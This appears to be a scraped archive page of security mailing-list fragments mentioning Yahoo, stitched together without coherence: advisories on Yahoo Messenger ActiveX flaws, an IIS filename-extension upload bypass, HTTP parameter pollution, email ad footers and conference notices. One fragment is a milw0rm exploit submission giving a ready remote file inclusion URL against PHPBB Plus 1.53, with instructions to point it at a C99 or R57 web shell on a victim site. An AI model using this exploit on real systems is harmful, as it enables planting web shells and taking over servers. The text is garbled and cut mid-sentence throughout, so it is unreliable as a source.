Next Page >>
Yahoo! Canada
--On Wednesday, November 21, 2007 21:45:35 +1100 XSS Worm XSS Security
Information Portal <cross-site-scripting-security@xssworm.com> wrote:
>
> In the case of Yahoo, security firm Finjan said hackers exploited an
> unused IP address within Yahoo's hierarchy and used that as the domain
> address behind a forged Google Analytics domain name. This fooled the
> Finjan Web-filtering product into believing a person was going to a
> highly trusted Yahoo domain. The victims, customers of Finjan, never knew
> they were on a malicious Web site, and neither did the security
> mechanisms on the network. (In this case, Finjan's Web-filtering
Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow
Vulnerabilities
iDefense Security Advisory 08.30.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 30, 2007
I. BACKGROUND
Yahoo! Messenger is a instant messaging application that allows users to
application to visit arbitrary web sites. This may apply for other Flickr's
API libraries and applications as well.
--Vendor Response
An initial notification was sent to Yahoo! Flickr on Sep. 5, 2009. A copy
of this advisory was sent to Yahoo! Flickr on Sep. 13, 2009. Yahoo! Flickr
replied on Sep. 14, 2009 to acknowledge the vulnerability. Yahoo! Flickr
sent us an email on Sep. 23, 2009 to say that they were going to deploy a
fix in the same week.
#####################################################################################
(PRL-2009-11)
__________________________________________________________________
Yahoo! Canada Toolbar: Search from anywhere on the web, and bookmark your favourite sites. Download it now
http://ca.toolbar.yahoo.com.
Hi Milw0rm .
My Name ( AUTHOR ) Is = Mehrad Ansari Targhi
My E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989
Please Instert My Name And E-Mail And My Yahoo Messenger In The Exploit .
I Found a Bug In PHPBB PLUS 1.53 .
This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang_main_album.php
Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=
Just Replace http://Shell.txt With Your Script Source Address Like C99 Or R57 Or ... And Replace [PHPPLUS] With Your Victim URL And Remove [] From The Exploit .
> -Patrick
>
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
********************************************************************************
Product:
Yahoo Messenger 9.0.0.2162
********************************************************************************
Vulnerability:
ActiveX Null Pointer - Denial of Service
-Attacks are done via crossover cable. (attacker controls default route)
-RF attacks are done offsite by special arrangement...
-No physical access to the machines.
-Major web browsers (IE, Safari, Konqueror, Firefox), widely used and
deployed plugin frameworks (AIR, Silverlight), IM clients (MSN, Adium,
Skype, Pigdin, AOL, Yahoo), Mail readers (Outlook, Mail.app, Thunderbird,
kmail) are all in scope.
-Attacks are done via crossover cable. (attacker controls default route)
-RF attacks are done offsite by special arrangement...
-No physical access to the machines.
-Major web browsers (IE, Safari, Konqueror, Firefox), widely used and
deployed plugin frameworks (AIR, Silverlight), IM clients (MSN, Adium,
Skype, Pigdin, AOL, Yahoo), Mail readers (Outlook, Mail.app, Thunderbird,
kmail) are all in scope.
GZIP,
BZIP2, Unix/Linux ZIP, LZH, etc.
Network/Applications Controlled
* Email: Microsoft Outlook, Lotus Notes and SMTP Email
* Web mail: MSN/Hotmail, Yahoo, GMail, AOL Mail, and more
* Instant Messaging: MSN, AIM, Yahoo, and more
* Network Protocols: FTP, HTTP/HTTPS and SMTP Endpoint Devices Controlled
* USB, CD/DVD, COM & LPT ports, removable disks, floppy, infrared and
imaging
devices, print screen, modems, PCMCIA
That's exactly what it's about. Cookies are name value pairs sent and
received based on simple rules. Rules that happen to be poorly
standardized with few guarantees. Everything else is what you make of
it: frameworks and protocols that use this primitive as they see fit.
> Spend some time on *.yahoo* and *.google* and their partner sites, and
> look at how they use both auth and personalization cookies (two
> different things).
Whatever google and yahoo and social-networking-site-fad-of-the-month
are doing doesn't really matter to most web developers and
Hi Folks,
during OWASP AppSec 2009 we have presented a newly discovered input validation vulnerability called "HTTP Parameter Pollution" (HPP).
Basically, it can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters.
During the last months, we have discovered several real world flaws in which HPP can be used to modify the application behaviors, access uncontrollable variables and even bypass input validation checkpoints and WAFs rules. Exploiting such HPP vulnerabilities, we have found several problems in some Google Search Appliance front-end scripts, Ask.com, Yahoo! Mail Classic and many other products.
If you enjoy the web security world, you are kindly invited to have a look at:
http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
We're going to release additional materials in the next future, including a video of the Yahoo! attack vector.
On Wed, 21 Nov 2007, Paul Schmehl wrote:
> If Yahoo was able to fix the problem quickly, then it would appear that Yahoo
> had a compromised domain server or servers.
We all get pwned at one point or another, how we respond is what matters.
>
> --
> Paul Schmehl (pauls@utdallas.edu)
############################################################
#Application: Microsoft Internet Information Services - IIS (All versions)
#Impact: Highly Critical for Web Applications
#Finding Date: April 2007
#Report Date: Dec. 2009
#Found by: Soroush Dalili (Irsdl {4t] yahoo [d0t} com)
#Website: Soroush.SecProject.com
#Weblog: Soroush.SecProject.com/blog/
#Thanks From: Mr. Ali Abbas Nejad, Mormoroth, Aria-Security Team, and other ethical hackers.
#Vulnerability/Risk Description:
- IIS can execute any extension as an Active Server Page or any other executable extension. For instance “malicious.asp;.jpg” is executed as an ASP file on the server. Many file uploaders protect the system by checking only the last section of the filename as its extension. And by using this vulnerability, an attacker can bypass this protection and upload a dangerous executable file on the server.
There is no solution at the time of this entry.
####################
- Credit :
####################
Discovered by: trueend5 (trueend5 [at] yahoo com)
This advisory is sponsored by FarsiList:
http://www.farsilist.ir
A Persian Web Based Electronic Maling-List Management System
submissions for turbo-talks is possible.
For more information you can check out the web pages for previous ISOI
workshops:
Yahoo - http://isotf.org/isoi44html
ICANN/ISOC/Afilias - http://isotf.org/isoi3.html
Microsoft - http://isotf.org/isoi2.html
Cisco - http://isotf.org/isoi.html
A perliminary program will become available in a few weeks on:
Cesar.
____________________________________________________________________________________
Be a better friend, newshound, and
know-it-all with Yahoo! Mobile. Try it now. http://mobile.yahoo.com/;_ylt=Ahu06i62sR8HDtDypao8Wcj9tAcJ
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)
----------------------------------------------------------------------
Author: ShipNX <ship_nx [AT] yahoo com>
Impact: Remote file include
Status: Patch not available
----------------------------------------------------------------------
print "All Done\n";
____________________________________________________________________________________
Be a better Heartthrob. Get better relationship answers from someone who knows. Yahoo! Answers - Check it out.
http://answers.yahoo.com/dir/?link=list&sid=396545433
#####################################################################################
(PRL-2009-12)
__________________________________________________________________
Make your browsing faster, safer, and easier with the new Internet Explorer® 8. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/
11 September 2008
*About:*
Pidgin is a graphical modular messaging client based on libpurple which
is capable
of connecting to AIM, MSN, Yahoo!, XMPP, ICQ, IRC, SILC, SIP/SIMPLE,
Novell GroupWise,
Lotus Sametime, Bonjour, Zephyr, MySpaceIM, Gadu-Gadu, and QQ all at
once. It is written using GTK+.
*Description:*
use and distribution under the terms of either of those licenses.
Jetty is used in a wide variety of projects and products: embedded in
phones, in tools like the the eclipse IDE, in frameworks like GWT, in
application servers like Apache Geronimo and in huge clusters like
Yahoo's Hadoop cluster.
The latest version at the time of writing can be obtained from:
http://dist.codehaus.org/jetty/jetty-7.0.0/jetty-hightide-7.0.0.v2009100
5.tar.gz
____________________________________________________________________________________
Be a better pen pal.
Text or chat with friends inside Yahoo! Mail. See how. http://overview.mail.yahoo.com/
RS>
RS> ____________________________________________________________________________________
RS> Be a better pen pal.
RS> Text or chat with friends inside Yahoo! Mail. See how. http://overview.mail.yahoo.com/
--
~/ZARAZA http://securityvulns.com/
þ ÿ . ()
Cesar.
____________________________________________________________________________________
Never miss a thing. Make Yahoo your home page.
http://www.yahoo.com/r/hs
____________________________________________________________________________________
Be a better sports nut! Let your teams follow you
with Yahoo Mobile. Try it now. http://mobile.yahoo.com/sports;_ylt=At9_qDKvtAbMuh1G1SQtBI7ntAcJ
--------------------------------------------
http://isotf.org/isoi6.html (hosted by University of Texas, Dallas,
Baylor and Sunbelt)
http://isotf.org/isoi5.html (hosted by Estonian CERT with reception by
Norman)
http://isotf.org/isoi4.html (hosted by Yahoo!)
http://isotf.org/isoi3.html (hosted by ISOC, Afilias and ICANN)
http://isotf.org/isoi2.html (hosted by Microsoft with reception by
Trendmicro)
http://isotf.org/isoi.html (hosted by Cisco with reception by ISC)
/*
# The servers provided by OpenDNS are fast, but they do not reply with
# NXDOMAIN for non-existant domains, instead they supply you with an
# address of one of their search engines. They also lie about the addresses of
# of the search engines of google, microsoft and yahoo.
# If you do not like this behaviour the "reject" option may be useful.
server {
label = "opendns";
ip = 208.67.222.222, 208.67.220.220;
reject = 208.69.32.0/24, # You may need to add additional address ranges
> surface without any legacy dependencies". This is my general view on
> the
> gadget API.
>
Yahoo widgets.
> Finally, why on earth does the trust model for gadgets consist of full
> trust
> and nothing more. Why not allow gadgets to state in their manifest
back online - too many users ..
On 9/21/07, Rohit Srivastwa <rsrivastwa@yahoo.com> wrote:
> And your website is down at this moment
>
> http://www.gnucitizen.org/ 403
> http://www.gnucitizen.org/blog/ 403
> http://www.gnucitizen.org/blog/0day-pdf-pwns-windows 404
>
> Is it a reverse attack by someone hurt :)
Next Page>>
|
